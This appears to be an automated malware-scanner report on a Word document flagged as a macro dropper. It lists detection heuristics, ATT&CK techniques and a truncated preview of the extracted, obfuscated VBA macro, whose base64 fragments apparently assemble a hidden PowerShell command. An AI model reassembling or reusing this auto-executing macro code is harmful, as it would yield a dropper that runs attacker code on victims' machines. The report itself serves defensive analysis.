Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call and is marked as an auto-executing macro (AutoOpen), meaning it is designed to run automatically when the document is opened. This strongly suggests the macro's purpose is to download and execute a second-stage payload. The ClamAV signature name (Doc.Dropper.Agent) also points to dropper functionality.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6362166-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6362166-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40969 bytes |

SHA-256: 66ad90aeb341e4bf07ac45d0dfc3b421a9c23f4eac7c591d13386c9194efaf18

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 60 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SiqVHJBoX"
Function LuUbIlskz()
dSECBjSoo = IdfcPutWj
BWYnt = Mid("9aphBwklJZE25EsWA3ACAALAAgADgAMwAsADkAOQAgACwAMQAxADQALAAgADEAMAA1ACAALAAxADEAMgAsACAAMQAxADYALAAgADQANgAgACwAIAA4ADMALAAxADAANAAsACAAMQAwADEALAAxADAAOAAgACwAMQAwADgALAAdMHz7", 17, 153)
FnaiqCzrSA = BWYnt
YnCmmmNvT = ZLzwHitFP
jiiiWd = Mid("ERKbQ0jIEDJlrZ7ZO9lU4DkANwAsADEAMQA2ACwAMQAwADQALAAzADIAIAAsACAANgAxACwAMwAyACAALAAzADYALAAgADEAMAAxACAALAAgADEAMQAwACAALAAgADEAMQA4ACwANQA4ACwAMQAxADYAIAAsADEAMAAxACp5", 22, 145)
fdXKmiHp = jiiiWd
PiDiFXpIf = BhwwsrNOi
hSKqoFuludz = Mid("tvzN5mjAbAxADAAIAAsADUANAAgACwANQA2ACAALAAgADQANgAsACAAMQAwADAALAAxADAAMQAgACwAIAA0ADcAIAAsACAAMQAwADcALAA4ADkALAAgADkAMAAgACwANAA3ACwAIAAzARLSiDQjHBqGzP74", 10, 131)
oYHwHZrEH = hSKqoFuludz
zrfSoFNtc = rLVBiJfdr
RkwzDk = Mid("HiJPSLpO8jh0GNiAsACAAMQAxADzWk1vU4NArc71If", 16, 12)
CGwKnMGtwwj = RkwzDk
fqhfwiHMO = UcTGjtwwO
iwAQRc = Mid("uQAgACwAIAAxADIANQAgACkAKQApAA==VLdUt55j6bQLBK5Sl7", 2, 31)
cIkbvZr = iwAQRc
jzpzUMuww = JzwoQOzhX
TYZsJnGvLw = Mid("af8hmfLWMYctCAALAAxADAAOQAgACwAIAAx9LpPr9nufEqAA", 14, 22)
SKISHC = TYZsJnGvLw
ASuAKcrsQ = JkccFmvvj
AWFiTnU = Mid("l6lVZU7vZPUh9chlYJEALAA5ADgALAA2ADcALAAxADAAOAAsACAAMQAwADUAIAAsADEAMAAxACAALAAxADEAMAAsADEAMQA2ACwAIAA1ADkALAAzqTtRLFQ3Ziz0", 19, 94)
thODpAEqj = AWFiTnU
BiWVkwhzM = PjLEGBVvd
IwAJNbGNi = Mid("8FQAxADYALAAxADEANgAgACwAMQAxADIAIAAsACAANQA4ACwAIAA0ADcALAAgADQANwAgACwAIAAxADAAMQAsADEAMAA5ACwAIAAxADAAOQAgACwZULpc2izpjBNl6jGA3ACNNQnvL", 3, 110)
LENUjDjBJl = IwAJNbGNi
TjmNFcvlN = UjuLtUiwz
qvLlNfl = Mid("fTs5AziHjT412ACAALAAxADAAMgAsADmYX5", 13, 19)
RzRwqaWG = qvLlNfl
BiivSNQbM = FEiaGJJbM
dnmXznssoQi = Mid("hGfTvIfHACwAIAAxADEANwAgACwAMQAxADUALAA0ADYAIAAsACAAMQAwADAALAAxADAANwAgCTAKHiiZ5EZ4rlZX4i8Zv", 9, 64)
XANlDs = dnmXznssoQi
tocuZwlNQ = RDmqVICUQ
wfKMQSjHkz = Mid("T1bKRjGQihSMZpE4wTB9sqwlJPAIAAsACAAOQA3ACAALAA0ADUAIAAsACAAMQAxADQAIAAsADkANwAgACwAMQAxADUAIAAsADEAMAA5IvbQw", 27, 77)
oVYCDQU = wfKMQSjHkz
uYQZzdPqj = jtakCSIoK
PAXAiVdhfdK = Mid("8wBjNfjYpisADEAMgAgACwAIAAzADIALAAgADQAMwAgACwAMwAyACwAIAAzADkAIAAsACAAOQAyACAALAAgADMAOQAsADMAMgAgACwAIAA0ADMAIAAsADMAMgAgACwAMwA2ACwAIAAxADEAMAAgACwAOQA3ACAALAAgAJwmNJ", 12, 153)
AKdnuL = PAXAiVdhfdK
WGEjKFwwY = aOjVYlsOD
UqPTd = Mid("P5ADcAIAAsADEAMQwisFuAq5OYA5TPRAVqBw", 2, 15)
wDoPqCP = UqPTd
wUrzijSCU = qhBUihwjO
IQoVb = Mid("WjEL6uZXLYujbDAAMQAgACwAMQAyADAAIAAsACAAMQAxADYAIAAsADQAMAAgACwAIAA0ADkALAA0ADQALAAgADMAMgAgACwANQA0ACAALAA1ADMALAAgADUAMwAsACAANQAxACAALAA1ADQALAAgADQAMQAgACwANQA5ACwAMwA2ACAALAAxADEAMgAsArMlJOT272L35G", 14, 176)
WUHWFjJw = IQoVb
MLNLcwFpc = zNUoroOLT
MrZvmpWQj = Mid("L7dztzhMjm6MQAxADAAIAAsADEAMAAxACwAMQAxADkALAA0ADUALAAxADEAMQAsACAAOQA4ACAALAAgADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgAsACAAMwAyACAALAAgADgAMwAgACwAIAAxADIAMQAgACwAIAAxADEANQAsADEAMQA2ACAALAAgA87Kwc8vfCdMusC4oPsJMDhBX", 12, 181)
pZuOaks = MrZvmpWQj
SXcVRIkGR = WGfBWsXjD
qTEviw = Mid("l3LHdzipcAAMQAwADgALAAxADAANQAsADYAOAAgACwAMQAxADYAIAAsACAAMQAxADcALAA3ADcALAAgADkANwAgACwANAA3ACAALAAgADQANAAgACwAMQAwADQALAAgADEAMQA2ACwAIAAxADEANgAsADEAMQAyACwANQA4ACwAIAA0ADcALAA0ADcAIAAsADEAMQA1ACwAMQAx5J38JdPZOJKoqhYLr1wu4UQJj", 10, 198)
tRNumKhuSL = qTEviw
pkrstpGUo = zBpNFXNfI
vCQwMQNwmFd = Mid("l6RLH6iND9mC4AbgBhAG0AZQBbADMALAAxADEALAAyAF0ALQBqAG8AaQBuACcAJwApACAAKABbAHMAVAByAGkATgBnCGzL5LX", 12, 79)
mldjcfTGw = vCQwMQNwmFd
lqtFaWhjj = zvqcRKkZa
DBQBzB = Mid("iWkALAAxADAAMQAsACAAOQA5ACAALAAgADEAMQA2ACAALAZ4c8F0K2V7fT", 4, 43)
wmscMw = DBQBzB
cadnOwTkE = bJAIorjlq
WkAoaKiGZ = Mid("VY9bkihDwAMwA2ACwAIAAxADEANwAsADEAMQA0ACAALAAxADAAOAAgACwAMwAyACwAMQAwADUAIAAsADEAMQAwACAALAAzADIALAAgADMANgAsADEAMQA3ACwAMQAxADQAIAAsADEAMAA4ACwAMQAxADUALAA0ADEALAAxADIAMwoa5OfiDCzGQjhWXO", 9, 164)
djQnsYSON = WkAoaKiGZ
JkKVKKFJZ = zXkfcfwlF
URNzVlcRsj = Mid("co1zH3Tqj4iwu
... (truncated)